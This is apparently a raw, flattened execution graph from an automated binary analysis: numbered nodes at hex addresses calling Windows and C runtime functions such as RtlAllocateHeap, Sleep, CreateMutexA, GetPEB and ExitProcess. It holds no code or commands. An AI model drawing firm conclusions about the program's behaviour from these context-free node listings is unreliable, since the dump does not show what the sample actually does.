                                                                                                                execution_graph 9961 78a079 9964 78a081 shared_ptr 9961->9964 9962 78a154 shared_ptr 9967 7980c0 RtlAllocateHeap 9962->9967 9963 78a930 9965 7b6c6a RtlAllocateHeap 9963->9965 9964->9962 9964->9963 9966 78a953 Sleep CreateMutexA 9965->9966 9969 78a98e 9966->9969 9968 78a903 9967->9968 9970 78cc79 9971 78cc84 shared_ptr 9970->9971 9972 78ccda shared_ptr std::invalid_argument::invalid_argument 9971->9972 9973 7b6c6a RtlAllocateHeap 9971->9973 9974 78ce36 9973->9974 9980 797a00 9974->9980 9976 78ce92 9994 785c10 9976->9994 9978 78ce9d 10045 78ca70 9978->10045 9981 797a26 9980->9981 9982 797a2d 9981->9982 9983 797a81 9981->9983 9984 797a62 9981->9984 9982->9976 9987 79d3e2 RtlAllocateHeap 9983->9987 9991 797a76 __cftof 9983->9991 9985 797ab9 9984->9985 9986 797a69 9984->9986 9988 782480 RtlAllocateHeap 9985->9988 9989 79d3e2 RtlAllocateHeap 9986->9989 9987->9991 9990 797a6f 9988->9990 9989->9990 9990->9991 9992 7b6c6a RtlAllocateHeap 9990->9992 9991->9976 9993 797ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 9992->9993 9993->9976 10065 785940 9994->10065 9996 785c54 10068 784b30 9996->10068 9999 785d17 shared_ptr std::invalid_argument::invalid_argument 9999->9978 10000 7b6c6a RtlAllocateHeap 10001 785d47 __cftof 10000->10001 10001->10001 10002 7980c0 RtlAllocateHeap 10001->10002 10004 785e3e 10002->10004 10003 785ea6 shared_ptr std::invalid_argument::invalid_argument 10003->9978 10004->10003 10005 7b6c6a RtlAllocateHeap 10004->10005 10006 785ed2 10005->10006 10007 785ffe shared_ptr std::invalid_argument::invalid_argument 10006->10007 10008 7b6c6a RtlAllocateHeap 10006->10008 10007->9978 10009 78601b 10008->10009 10010 7980c0 RtlAllocateHeap 10009->10010 10011 786089 10010->10011 10012 7980c0 RtlAllocateHeap 10011->10012 10013 7860bd 10012->10013 10014 7980c0 RtlAllocateHeap 10013->10014 10015 7860ee 10014->10015 10016 7980c0 RtlAllocateHeap 10015->10016 10017 78611f 10016->10017 10018 7980c0 RtlAllocateHeap 10017->10018 10020 786150 10018->10020 10019 7865b1 shared_ptr std::invalid_argument::invalid_argument 10019->9978 10020->10019 10021 7b6c6a RtlAllocateHeap 10020->10021 10022 7865dc 10021->10022 10023 797a00 RtlAllocateHeap 10022->10023 10024 7866a6 10023->10024 10025 785c10 4 API calls 10024->10025 10026 7866ac 10025->10026 10027 785c10 4 API calls 10026->10027 10028 7866b1 10027->10028 10075 7822c0 10028->10075 10030 7866c9 shared_ptr 10031 797a00 RtlAllocateHeap 10030->10031 10032 786732 10031->10032 10033 785c10 4 API calls 10032->10033 10034 78673d 10033->10034 10035 7822c0 4 API calls 10034->10035 10044 786757 shared_ptr 10035->10044 10036 786852 10037 7980c0 RtlAllocateHeap 10036->10037 10039 78689c 10037->10039 10038 797a00 RtlAllocateHeap 10038->10044 10040 7980c0 RtlAllocateHeap 10039->10040 10043 7868e3 shared_ptr std::invalid_argument::invalid_argument 10040->10043 10041 785c10 4 API calls 10041->10044 10042 7822c0 4 API calls 10042->10044 10043->9978 10044->10036 10044->10038 10044->10041 10044->10042 10046 78cadd 10045->10046 10047 78cc87 10046->10047 10048 797a00 RtlAllocateHeap 10046->10048 10050 78ccda shared_ptr std::invalid_argument::invalid_argument 10047->10050 10052 7b6c6a RtlAllocateHeap 10047->10052 10049 78ccee 10048->10049 10051 785c10 4 API calls 10049->10051 10053 78ccf9 10051->10053 10054 78ce36 10052->10054 10572 789030 10053->10572 10056 797a00 RtlAllocateHeap 10054->10056 10058 78ce92 10056->10058 10057 78cd0d 10585 798220 10057->10585 10060 785c10 4 API calls 10058->10060 10062 78ce9d 10060->10062 10061 78cd1f 10593 798f40 10061->10593 10063 78ca70 4 API calls 10062->10063 10078 797f80 10065->10078 10067 78596b 10067->9996 10069 784dc2 10068->10069 10073 784b92 10068->10073 10069->9999 10069->10000 10071 784ce5 10071->10069 10072 798ca0 RtlAllocateHeap 10071->10072 10072->10071 10073->10071 10093 7b6da6 10073->10093 10098 798ca0 10073->10098 10286 782280 10075->10286 10081 797f9e __cftof 10078->10081 10083 797fc7 10078->10083 10079 7980b3 10080 799270 RtlAllocateHeap 10079->10080 10082 7980b8 10080->10082 10081->10067 10084 782480 RtlAllocateHeap 10082->10084 10083->10079 10085 79801b 10083->10085 10086 79803e 10083->10086 10087 7980bd 10084->10087 10085->10082 10089 79d3e2 RtlAllocateHeap 10085->10089 10088 79d3e2 RtlAllocateHeap 10086->10088 10091 79802c __cftof 10086->10091 10088->10091 10089->10091 10090 7b6c6a RtlAllocateHeap 10090->10079 10091->10090 10092 798095 shared_ptr 10091->10092 10092->10067 10094 7b6dc2 10093->10094 10095 7b6db4 10093->10095 10094->10073 10113 7b6d19 10095->10113 10099 798dc9 10098->10099 10100 798cc3 10098->10100 10101 799270 RtlAllocateHeap 10099->10101 10103 798d2f 10100->10103 10104 798d05 10100->10104 10102 798dce 10101->10102 10105 782480 RtlAllocateHeap 10102->10105 10106 798d16 __cftof 10103->10106 10110 79d3e2 RtlAllocateHeap 10103->10110 10104->10102 10107 798d10 10104->10107 10105->10106 10108 7b6c6a RtlAllocateHeap 10106->10108 10112 798d8b shared_ptr __cftof 10106->10112 10109 79d3e2 RtlAllocateHeap 10107->10109 10111 798dd8 10108->10111 10109->10106 10110->10106 10112->10073 10118 7b690a 10113->10118 10117 7b6d3d 10117->10073 10119 7b692a 10118->10119 10120 7b6921 10118->10120 10119->10120 10132 7ba671 10119->10132 10126 7b6d52 10120->10126 10127 7b6d8f 10126->10127 10129 7b6d5f 10126->10129 10270 7bb67d 10127->10270 10130 7b6d6e 10129->10130 10265 7bb6a1 10129->10265 10130->10117 10133 7ba67b __dosmaperr 10132->10133 10134 7bd82f __dosmaperr RtlAllocateHeap 10133->10134 10135 7ba694 10133->10135 10137 7ba6bc __dosmaperr 10134->10137 10136 7b694a 10135->10136 10154 7b8bec 10135->10154 10146 7bb5fb 10136->10146 10139 7ba6c4 __dosmaperr 10137->10139 10140 7ba6fc 10137->10140 10141 7badf5 __freea RtlAllocateHeap 10139->10141 10143 7ba49f __dosmaperr RtlAllocateHeap 10140->10143 10141->10135 10144 7ba707 10143->10144 10145 7badf5 __freea RtlAllocateHeap 10144->10145 10145->10135 10147 7bb60e 10146->10147 10148 7b6960 10146->10148 10147->10148 10187 7bf5ab 10147->10187 10150 7bb628 10148->10150 10151 7bb63b 10150->10151 10152 7bb650 10150->10152 10151->10152 10200 7be6b1 10151->10200 10152->10120 10155 7b8bf1 __cftof 10154->10155 10159 7b8bfc __cftof 10155->10159 10160 7bd634 10155->10160 10181 7b65ed 10159->10181 10161 7bd640 __dosmaperr 10160->10161 10162 7bd667 __cftof 10161->10162 10163 7ba7c8 __dosmaperr RtlAllocateHeap 10161->10163 10168 7bd66d __cftof __dosmaperr 10161->10168 10164 7bd6b2 10162->10164 10162->10168 10180 7bd69c 10162->10180 10163->10162 10165 7b75f6 __dosmaperr RtlAllocateHeap 10164->10165 10166 7bd6b7 10165->10166 10167 7b6c5a __cftof RtlAllocateHeap 10166->10167 10167->10180 10169 7bd81b __cftof 10168->10169 10170 7bd726 10168->10170 10171 7bd751 __cftof 10168->10171 10172 7b65ed __cftof 3 API calls 10169->10172 10170->10171 10184 7bd62b 10170->10184 10175 7ba671 __cftof 4 API calls 10171->10175 10178 7bd7a5 10171->10178 10171->10180 10174 7bd82e 10172->10174 10175->10178 10177 7bd62b __cftof 4 API calls 10177->10171 10179 7ba671 __cftof 4 API calls 10178->10179 10178->10180 10179->10180 10180->10159 10182 7b64c7 __cftof 3 API calls 10181->10182 10183 7b65fe 10182->10183 10185 7ba671 __cftof 4 API calls 10184->10185 10186 7bd630 10185->10186 10186->10177 10188 7bf5b7 __dosmaperr 10187->10188 10189 7ba671 __cftof 4 API calls 10188->10189 10190 7bf5c0 __dosmaperr 10189->10190 10193 7bf606 10190->10193 10196 7bf62c 10190->10196 10192 7bf5ef __cftof 10192->10193 10194 7b8bec __cftof 4 API calls 10192->10194 10193->10148 10195 7bf62b 10194->10195 10197 7bf647 10196->10197 10198 7bf63a __dosmaperr 10196->10198 10197->10192 10198->10197 10199 7bf35f __dosmaperr RtlAllocateHeap 10198->10199 10199->10197 10201 7ba671 __cftof 4 API calls 10200->10201 10202 7be6bb 10201->10202 10205 7be5c9 10202->10205 10204 7be6c1 10204->10152 10207 7be5d5 __dosmaperr 10205->10207 10206 7be5f6 10206->10204 10208 7be5ef __cftof 10207->10208 10213 7badf5 __freea RtlAllocateHeap 10207->10213 10208->10206 10209 7b8bec __cftof 4 API calls 10208->10209 10210 7be668 10209->10210 10211 7be6a4 10210->10211 10216 7ba72e 10210->10216 10211->10204 10213->10208 10217 7ba739 __dosmaperr 10216->10217 10218 7bd82f __dosmaperr RtlAllocateHeap 10217->10218 10228 7ba745 10217->10228 10222 7ba769 __dosmaperr 10218->10222 10219 7b8bec __cftof 4 API calls 10220 7ba7c7 10219->10220 10221 7ba7be 10230 7be4b0 10221->10230 10223 7ba7a5 10222->10223 10224 7ba771 __dosmaperr 10222->10224 10225 7ba49f __dosmaperr RtlAllocateHeap 10223->10225 10226 7badf5 __freea RtlAllocateHeap 10224->10226 10227 7ba7b0 10225->10227 10226->10228 10229 7badf5 __freea RtlAllocateHeap 10227->10229 10228->10219 10228->10221 10229->10228 10231 7be5c9 __cftof 4 API calls 10230->10231 10232 7be4c3 10231->10232 10249 7be259 10232->10249 10235 7be4dc 10235->10211 10238 7be51f 10241 7badf5 __freea RtlAllocateHeap 10238->10241 10240 7be512 10242 7be51a 10240->10242 10246 7be535 __cftof 10240->10246 10243 7be52d 10241->10243 10244 7b75f6 __dosmaperr RtlAllocateHeap 10242->10244 10243->10211 10244->10238 10245 7be561 10245->10238 10261 7be14b 10245->10261 10246->10245 10247 7badf5 __freea RtlAllocateHeap 10246->10247 10247->10245 10250 7b690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10249->10250 10251 7be26b 10250->10251 10251->10235 10252 7bb04b 10251->10252 10254 7bb059 __dosmaperr 10252->10254 10253 7b75f6 __dosmaperr RtlAllocateHeap 10255 7bb087 10253->10255 10254->10253 10254->10255 10255->10238 10256 7be6c4 10255->10256 10257 7be259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10256->10257 10260 7be6e4 __cftof 10257->10260 10258 7be75a __cftof std::invalid_argument::invalid_argument 10258->10240 10259 7be32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10259->10258 10260->10258 10260->10259 10262 7be157 __dosmaperr 10261->10262 10263 7be198 __cftof RtlAllocateHeap 10262->10263 10264 7be16e __cftof 10263->10264 10264->10238 10266 7b690a __cftof 4 API calls 10265->10266 10267 7bb6be 10266->10267 10269 7bb6ce std::invalid_argument::invalid_argument 10267->10269 10275 7bf1bf 10267->10275 10269->10130 10271 7ba671 __cftof 4 API calls 10270->10271 10272 7bb688 10271->10272 10273 7bb5fb __cftof 4 API calls 10272->10273 10274 7bb698 10273->10274 10274->10130 10276 7b690a __cftof 4 API calls 10275->10276 10277 7bf1df __cftof 10276->10277 10278 7bb04b __cftof RtlAllocateHeap 10277->10278 10279 7bf29d std::invalid_argument::invalid_argument 10277->10279 10281 7bf232 __cftof 10277->10281 10278->10281 10279->10269 10282 7bf2c2 10281->10282 10283 7bf2ce 10282->10283 10284 7bf2df 10282->10284 10283->10284 10285 7badf5 __freea RtlAllocateHeap 10283->10285 10284->10279 10285->10284 10287 782296 10286->10287 10290 7b87f8 10287->10290 10293 7b7609 10290->10293 10292 7822a4 10292->10030 10294 7b7649 10293->10294 10295 7b7631 10293->10295 10294->10295 10296 7b7651 10294->10296 10297 7b75f6 __dosmaperr RtlAllocateHeap 10295->10297 10298 7b690a __cftof 4 API calls 10296->10298 10299 7b7636 10297->10299 10301 7b7661 10298->10301 10300 7b6c5a __cftof RtlAllocateHeap 10299->10300 10302 7b7641 std::invalid_argument::invalid_argument 10300->10302 10306 7b7bc4 10301->10306 10302->10292 10322 7b868d 10306->10322 10308 7b76e8 10319 7b7a19 10308->10319 10309 7b7be4 10310 7b75f6 __dosmaperr RtlAllocateHeap 10309->10310 10311 7b7be9 10310->10311 10312 7b6c5a __cftof RtlAllocateHeap 10311->10312 10312->10308 10313 7b7bd5 10313->10308 10313->10309 10329 7b7d15 10313->10329 10337 7b8168 10313->10337 10342 7b7dc2 10313->10342 10347 7b7de8 10313->10347 10376 7b7f36 10313->10376 10320 7badf5 __freea RtlAllocateHeap 10319->10320 10321 7b7a29 10320->10321 10321->10302 10323 7b8692 10322->10323 10324 7b86a5 10322->10324 10325 7b75f6 __dosmaperr RtlAllocateHeap 10323->10325 10324->10313 10326 7b8697 10325->10326 10327 7b6c5a __cftof RtlAllocateHeap 10326->10327 10328 7b86a2 10327->10328 10328->10313 10398 7b7d34 10329->10398 10331 7b7d1a 10332 7b7d31 10331->10332 10333 7b75f6 __dosmaperr RtlAllocateHeap 10331->10333 10332->10313 10334 7b7d23 10333->10334 10335 7b6c5a __cftof RtlAllocateHeap 10334->10335 10336 7b7d2e 10335->10336 10336->10313 10338 7b8178 10337->10338 10339 7b8171 10337->10339 10338->10313 10407 7b7b50 10339->10407 10343 7b7dcb 10342->10343 10344 7b7dd2 10342->10344 10345 7b7b50 4 API calls 10343->10345 10344->10313 10346 7b7dd1 10345->10346 10346->10313 10348 7b7e09 10347->10348 10349 7b7def 10347->10349 10350 7b75f6 __dosmaperr RtlAllocateHeap 10348->10350 10354 7b7e39 10348->10354 10351 7b7fbb 10349->10351 10352 7b7f4f 10349->10352 10349->10354 10353 7b7e25 10350->10353 10356 7b7fc2 10351->10356 10357 7b8001 10351->10357 10364 7b7f92 10351->10364 10361 7b7f5b 10352->10361 10352->10364 10355 7b6c5a __cftof RtlAllocateHeap 10353->10355 10354->10313 10359 7b7e30 10355->10359 10360 7b7fc7 10356->10360 10369 7b7f69 10356->10369 10466 7b8604 10357->10466 10359->10313 10360->10364 10366 7b7fcc 10360->10366 10365 7b7fa2 10361->10365 10361->10369 10374 7b7f77 10361->10374 10364->10374 10375 7b7f8b 10364->10375 10451 7b8420 10364->10451 10365->10375 10437 7b8390 10365->10437 10367 7b7fdf 10366->10367 10368 7b7fd1 10366->10368 10445 7b8571 10367->10445 10368->10375 10441 7b85e5 10368->10441 10369->10374 10369->10375 10460 7b8241 10369->10460 10374->10375 10469 7b86ea 10374->10469 10375->10313 10377 7b7fbb 10376->10377 10378 7b7f4f 10376->10378 10379 7b7fc2 10377->10379 10380 7b8001 10377->10380 10388 7b7f92 10377->10388 10384 7b7f5b 10378->10384 10378->10388 10381 7b7f69 10379->10381 10382 7b7fc7 10379->10382 10383 7b8604 RtlAllocateHeap 10380->10383 10386 7b8241 4 API calls 10381->10386 10396 7b7f77 10381->10396 10397 7b7f8b 10381->10397 10387 7b7fcc 10382->10387 10382->10388 10383->10396 10384->10381 10389 7b7fa2 10384->10389 10384->10396 10385 7b8420 RtlAllocateHeap 10385->10396 10386->10396 10390 7b7fdf 10387->10390 10391 7b7fd1 10387->10391 10388->10385 10388->10396 10388->10397 10393 7b8390 4 API calls 10389->10393 10389->10397 10392 7b8571 RtlAllocateHeap 10390->10392 10394 7b85e5 RtlAllocateHeap 10391->10394 10391->10397 10392->10396 10393->10396 10394->10396 10395 7b86ea 4 API calls 10395->10397 10396->10395 10396->10397 10397->10313 10401 7b7d5e 10398->10401 10400 7b7d40 10400->10331 10403 7b7d80 10401->10403 10402 7b7db7 10402->10400 10403->10402 10404 7b75f6 __dosmaperr RtlAllocateHeap 10403->10404 10405 7b7dac 10404->10405 10406 7b6c5a __cftof RtlAllocateHeap 10405->10406 10406->10402 10408 7b7b67 10407->10408 10409 7b7b62 10407->10409 10415 7b8ab6 10408->10415 10410 7b75f6 __dosmaperr RtlAllocateHeap 10409->10410 10410->10408 10413 7b75f6 __dosmaperr RtlAllocateHeap 10414 7b7b99 10413->10414 10414->10313 10416 7b8ad1 10415->10416 10419 7b8868 10416->10419 10420 7b868d RtlAllocateHeap 10419->10420 10423 7b887a 10420->10423 10421 7b88b3 10422 7b690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10421->10422 10429 7b88bf 10422->10429 10423->10421 10424 7b888f 10423->10424 10436 7b7b85 10423->10436 10425 7b75f6 __dosmaperr RtlAllocateHeap 10424->10425 10426 7b8894 10425->10426 10427 7b6c5a __cftof RtlAllocateHeap 10426->10427 10427->10436 10428 7b6d52 GetPEB ExitProcess GetPEB RtlAllocateHeap 10428->10429 10429->10428 10431 7b88ee 10429->10431 10430 7b8958 10432 7b8a8d RtlAllocateHeap 10430->10432 10431->10430 10433 7b8a8d RtlAllocateHeap 10431->10433 10434 7b8a20 10432->10434 10433->10430 10435 7b75f6 __dosmaperr RtlAllocateHeap 10434->10435 10434->10436 10435->10436 10436->10413 10436->10414 10438 7b83ab 10437->10438 10439 7b83dd 10438->10439 10473 7bc88e 10438->10473 10439->10374 10442 7b85f1 10441->10442 10443 7b8420 RtlAllocateHeap 10442->10443 10444 7b8603 10443->10444 10444->10374 10450 7b8586 10445->10450 10446 7b75f6 __dosmaperr RtlAllocateHeap 10447 7b858f 10446->10447 10448 7b6c5a __cftof RtlAllocateHeap 10447->10448 10449 7b859a 10448->10449 10449->10374 10450->10446 10450->10449 10452 7b8433 10451->10452 10453 7b844e 10452->10453 10455 7b8465 10452->10455 10454 7b75f6 __dosmaperr RtlAllocateHeap 10453->10454 10456 7b8453 10454->10456 10459 7b845e 10455->10459 10497 7b779f 10455->10497 10458 7b6c5a __cftof RtlAllocateHeap 10456->10458 10458->10459 10459->10374 10461 7b825a 10460->10461 10462 7b779f RtlAllocateHeap 10461->10462 10463 7b8297 10462->10463 10510 7bd3c8 10463->10510 10465 7b830d 10465->10374 10467 7b8420 RtlAllocateHeap 10466->10467 10468 7b861b 10467->10468 10468->10374 10470 7b875d std::invalid_argument::invalid_argument 10469->10470 10472 7b8707 10469->10472 10470->10375 10471 7bc88e __cftof 4 API calls 10471->10472 10472->10470 10472->10471 10476 7bc733 10473->10476 10477 7bc743 10476->10477 10478 7bc76d 10477->10478 10479 7bc781 10477->10479 10488 7bc748 10477->10488 10481 7b75f6 __dosmaperr RtlAllocateHeap 10478->10481 10480 7b690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10479->10480 10482 7bc78c 10480->10482 10483 7bc772 10481->10483 10484 7bc79c 10482->10484 10489 7bc7c8 __cftof 10482->10489 10485 7b6c5a __cftof RtlAllocateHeap 10483->10485 10486 7c2b7d __cftof RtlAllocateHeap 10484->10486 10485->10488 10487 7bc7b1 10486->10487 10487->10488 10491 7b75f6 __dosmaperr RtlAllocateHeap 10487->10491 10488->10439 10493 7bc7de __cftof 10489->10493 10496 7bc815 __cftof 10489->10496 10490 7b75f6 __dosmaperr RtlAllocateHeap 10490->10488 10491->10488 10492 7b75f6 __dosmaperr RtlAllocateHeap 10494 7bc87f 10492->10494 10493->10488 10493->10490 10495 7b6c5a __cftof RtlAllocateHeap 10494->10495 10495->10488 10496->10488 10496->10492 10498 7b77b4 10497->10498 10501 7b77c3 10497->10501 10499 7b75f6 __dosmaperr RtlAllocateHeap 10498->10499 10500 7b77b9 10499->10500 10500->10459 10501->10500 10502 7bb04b __cftof RtlAllocateHeap 10501->10502 10503 7b77ea 10502->10503 10504 7b7801 10503->10504 10507 7b7a33 10503->10507 10506 7badf5 __freea RtlAllocateHeap 10504->10506 10506->10500 10508 7badf5 __freea RtlAllocateHeap 10507->10508 10509 7b7a42 10508->10509 10509->10504 10511 7bd3d8 10510->10511 10512 7bd3ee 10510->10512 10513 7b75f6 __dosmaperr RtlAllocateHeap 10511->10513 10512->10511 10517 7bd400 10512->10517 10514 7bd3dd 10513->10514 10515 7b6c5a __cftof RtlAllocateHeap 10514->10515 10516 7bd3e7 10515->10516 10516->10465 10518 7bd467 10517->10518 10524 7bd439 10517->10524 10519 7bd485 10518->10519 10520 7bd48a 10518->10520 10522 7bd4ae 10519->10522 10523 7bd4e4 10519->10523 10536 7bcbdf 10520->10536 10526 7bd4cc 10522->10526 10527 7bd4b3 10522->10527 10564 7bcef8 10523->10564 10531 7bd2ff 10524->10531 10557 7bd0e2 10526->10557 10547 7bd23e 10527->10547 10532 7bd320 10531->10532 10533 7bd315 10531->10533 10534 7ba1f1 ___std_exception_copy RtlAllocateHeap 10532->10534 10533->10516 10535 7bd37b __cftof 10534->10535 10535->10516 10537 7bcbf1 10536->10537 10538 7b690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10537->10538 10539 7bcc05 10538->10539 10540 7bcc0d 10539->10540 10541 7bcc21 10539->10541 10542 7b75f6 __dosmaperr RtlAllocateHeap 10540->10542 10544 7bcef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10541->10544 10546 7bcc1c __alldvrm __cftof _strrchr 10541->10546 10543 7bcc12 10542->10543 10545 7b6c5a __cftof RtlAllocateHeap 10543->10545 10544->10546 10545->10546 10546->10516 10548 7c31a8 RtlAllocateHeap 10547->10548 10549 7bd26c 10548->10549 10550 7c2c47 RtlAllocateHeap 10549->10550 10551 7bd29e 10550->10551 10552 7bd2a5 10551->10552 10553 7bd2de 10551->10553 10554 7bd2b7 10551->10554 10552->10516 10555 7bcf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10553->10555 10556 7bd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10554->10556 10555->10552 10556->10552 10558 7c31a8 RtlAllocateHeap 10557->10558 10559 7bd10f 10558->10559 10560 7c2c47 RtlAllocateHeap 10559->10560 10561 7bd147 10560->10561 10562 7bd14e 10561->10562 10563 7bd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10561->10563 10562->10516 10563->10562 10565 7bcf10 10564->10565 10566 7c31a8 RtlAllocateHeap 10565->10566 10567 7bcf29 10566->10567 10568 7c2c47 RtlAllocateHeap 10567->10568 10569 7bcf6e 10568->10569 10570 7bcf75 10569->10570 10571 7bcf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10569->10571 10570->10516 10571->10570 10573 789080 10572->10573 10574 797a00 RtlAllocateHeap 10573->10574 10575 78908f 10574->10575 10576 785c10 4 API calls 10575->10576 10577 78909a 10576->10577 10578 7980c0 RtlAllocateHeap 10577->10578 10579 7890ec 10578->10579 10580 798220 RtlAllocateHeap 10579->10580 10582 7890fe shared_ptr 10580->10582 10581 78917e shared_ptr std::invalid_argument::invalid_argument 10581->10057 10582->10581 10583 7b6c6a RtlAllocateHeap 10582->10583 10584 7891aa 10583->10584 10586 798248 10585->10586 10587 798292 10585->10587 10586->10587 10588 798251 10586->10588 10590 798f40 RtlAllocateHeap 10587->10590 10592 7982a1 10587->10592 10614 799280 10588->10614 10590->10592 10591 79825a 10591->10061 10592->10061 10594 798f6b 10593->10594 10595 79908e 10593->10595 10599 798fdc 10594->10599 10600 798fb2 10594->10600 10596 799270 RtlAllocateHeap 10595->10596 10597 799093 10596->10597 10598 782480 RtlAllocateHeap 10597->10598 10606 798fc3 __cftof 10598->10606 10604 79d3e2 RtlAllocateHeap 10599->10604 10599->10606 10600->10597 10601 798fbd 10600->10601 10603 79d3e2 RtlAllocateHeap 10601->10603 10602 7b6c6a RtlAllocateHeap 10605 79909d 10602->10605 10603->10606 10604->10606 10607 7990b8 10605->10607 10609 782480 Concurrency::cancel_current_task 10605->10609 10610 7990be 10605->10610 10606->10602 10611 79904c shared_ptr __cftof 10606->10611 10608 79d3e2 RtlAllocateHeap 10607->10608 10608->10610 10612 7b38af ___std_exception_copy RtlAllocateHeap 10609->10612 10610->10047 10611->10047 10613 7824c3 10612->10613 10613->10047 10615 799294 10614->10615 10618 7992a5 __cftof 10615->10618 10619 7994e0 10615->10619 10617 79932b 10617->10591 10618->10591 10620 799619 10619->10620 10621 79950b 10619->10621 10622 799270 RtlAllocateHeap 10620->10622 10625 799579 10621->10625 10626 799552 10621->10626 10623 79961e 10622->10623 10624 782480 RtlAllocateHeap 10623->10624 10632 799563 __cftof 10624->10632 10630 79d3e2 RtlAllocateHeap 10625->10630 10625->10632 10626->10623 10627 79955d 10626->10627 10629 79d3e2 RtlAllocateHeap 10627->10629 10628 7b6c6a RtlAllocateHeap 10631 799628 shared_ptr 10628->10631 10629->10632 10630->10632 10631->10617 10632->10628 10633 7995e1 shared_ptr __cftof 10632->10633 10633->10617 10634 782070 10635 7980c0 RtlAllocateHeap 10634->10635 10636 782081 10635->10636 10639 79d64e 10636->10639 10642 79d621 10639->10642 10643 79d630 10642->10643 10644 79d637 10642->10644 10648 7b988e 10643->10648 10651 7b98fa 10644->10651 10647 78208b 10649 7b98fa RtlAllocateHeap 10648->10649 10650 7b98a0 10649->10650 10650->10647 10654 7b9630 10651->10654 10653 7b992b 10653->10647 10655 7b963c __dosmaperr 10654->10655 10658 7b968b 10655->10658 10657 7b9657 10657->10653 10659 7b96a7 10658->10659 10661 7b971e __dosmaperr 10658->10661 10660 7b96fe 10659->10660 10659->10661 10668 7bedf6 10659->10668 10660->10661 10663 7bedf6 RtlAllocateHeap 10660->10663 10661->10657 10665 7b9714 10663->10665 10664 7b96f4 10667 7badf5 __freea RtlAllocateHeap 10664->10667 10666 7badf5 __freea RtlAllocateHeap 10665->10666 10666->10661 10667->10660 10669 7bee1e 10668->10669 10670 7bee03 10668->10670 10671 7bee2d 10669->10671 10677 7c4fdc 10669->10677 10670->10669 10672 7bee0f 10670->10672 10684 7c500f 10671->10684 10674 7b75f6 __dosmaperr RtlAllocateHeap 10672->10674 10676 7bee14 __cftof 10674->10676 10676->10664 10678 7c4fe7 10677->10678 10681 7c4ffc 10677->10681 10679 7b75f6 __dosmaperr RtlAllocateHeap 10678->10679 10680 7c4fec 10679->10680 10682 7b6c5a __cftof RtlAllocateHeap 10680->10682 10681->10671 10683 7c4ff7 10682->10683 10683->10671 10685 7c501c 10684->10685 10686 7c5027 10684->10686 10687 7bb04b __cftof RtlAllocateHeap 10685->10687 10688 7c502f 10686->10688 10691 7c5038 __dosmaperr 10686->10691 10692 7c5024 10687->10692 10689 7badf5 __freea RtlAllocateHeap 10688->10689 10689->10692 10690 7b75f6 __dosmaperr RtlAllocateHeap 10690->10692 10691->10690 10691->10692 10692->10676 10697 784276 10702 782410 10697->10702 10701 78428f 10703 782424 10702->10703 10717 79b52d 10703->10717 10706 783ce0 10707 783d42 10706->10707 10709 783d52 10706->10709 10773 797d50 10707->10773 10710 79d3e2 RtlAllocateHeap 10709->10710 10711 783d84 10710->10711 10712 797d50 RtlAllocateHeap 10711->10712 10714 783e03 10711->10714 10712->10714 10713 783e9b shared_ptr 10713->10701 10714->10713 10715 7b6c6a RtlAllocateHeap 10714->10715 10716 783ec1 10715->10716 10725 7b3aed 10717->10725 10719 78242a 10719->10706 10720 79b5a5 ___std_exception_copy 10732 79b1ad 10720->10732 10721 79b598 10728 79af56 10721->10728 10736 7b4f29 10725->10736 10729 79af9f ___std_exception_copy 10728->10729 10731 79afb2 shared_ptr 10729->10731 10749 79b39f 10729->10749 10731->10719 10733 79b1d8 10732->10733 10734 79b1e1 shared_ptr 10732->10734 10735 79b39f 5 API calls 10733->10735 10734->10719 10735->10734 10744 7b4f37 10736->10744 10738 7b4f2e __cftof 10739 79b555 10738->10739 10740 7bd634 __cftof 4 API calls 10738->10740 10743 7b8bfc __cftof 10738->10743 10739->10719 10739->10720 10739->10721 10740->10743 10741 7b65ed __cftof 3 API calls 10742 7b8c2f 10741->10742 10743->10741 10745 7b4f40 10744->10745 10747 7b4f43 10744->10747 10745->10738 10746 7b4f77 10746->10738 10747->10746 10748 7b8ba3 ___std_exception_destroy RtlAllocateHeap 10747->10748 10748->10746 10760 79bedf 10749->10760 10752 79b3e8 10752->10731 10769 79cc31 10760->10769 10763 7b6cbb 10764 7b6cc7 __dosmaperr 10763->10764 10765 7ba671 __cftof 4 API calls 10764->10765 10768 7b6ccc 10765->10768 10766 7b8bec __cftof 4 API calls 10767 7b6cf6 10766->10767 10768->10766 10770 79cc3f InitOnceExecuteOnce 10769->10770 10772 79b3e1 10769->10772 10770->10772 10772->10752 10772->10763 10774 797dcb 10773->10774 10775 797d62 10773->10775 10776 782480 RtlAllocateHeap 10774->10776 10777 797d6d 10775->10777 10778 797d9c 10775->10778 10780 797d7a 10776->10780 10777->10774 10781 797d74 10777->10781 10779 797db9 10778->10779 10783 79d3e2 RtlAllocateHeap 10778->10783 10779->10709 10784 7b6c6a RtlAllocateHeap 10780->10784 10786 797d83 10780->10786 10782 79d3e2 RtlAllocateHeap 10781->10782 10782->10780 10785 797da6 10783->10785 10792 797dd5 10784->10792 10785->10709 10786->10709 10787 797f20 10788 799270 RtlAllocateHeap 10787->10788 10801 797e91 __cftof 10788->10801 10789 797e01 10789->10709 10790 7b6c6a RtlAllocateHeap 10799 797f2a __cftof 10790->10799 10791 797f1b 10795 782480 RtlAllocateHeap 10791->10795 10792->10787 10792->10789 10792->10791 10793 797e80 10792->10793 10794 797ea7 10792->10794 10793->10791 10796 797e8b 10793->10796 10797 79d3e2 RtlAllocateHeap 10794->10797 10794->10801 10795->10787 10798 79d3e2 RtlAllocateHeap 10796->10798 10797->10801 10798->10801 10800 797f61 shared_ptr 10799->10800 10803 7b6c6a RtlAllocateHeap 10799->10803 10800->10709 10801->10790 10802 797f02 shared_ptr 10801->10802 10802->10709 10804 797f7c 10803->10804 10850 79be50 10853 79bd8b 10850->10853 10852 79be66 Concurrency::cancel_current_task std::_Throw_future_error 10854 7822e0 std::invalid_argument::invalid_argument RtlAllocateHeap 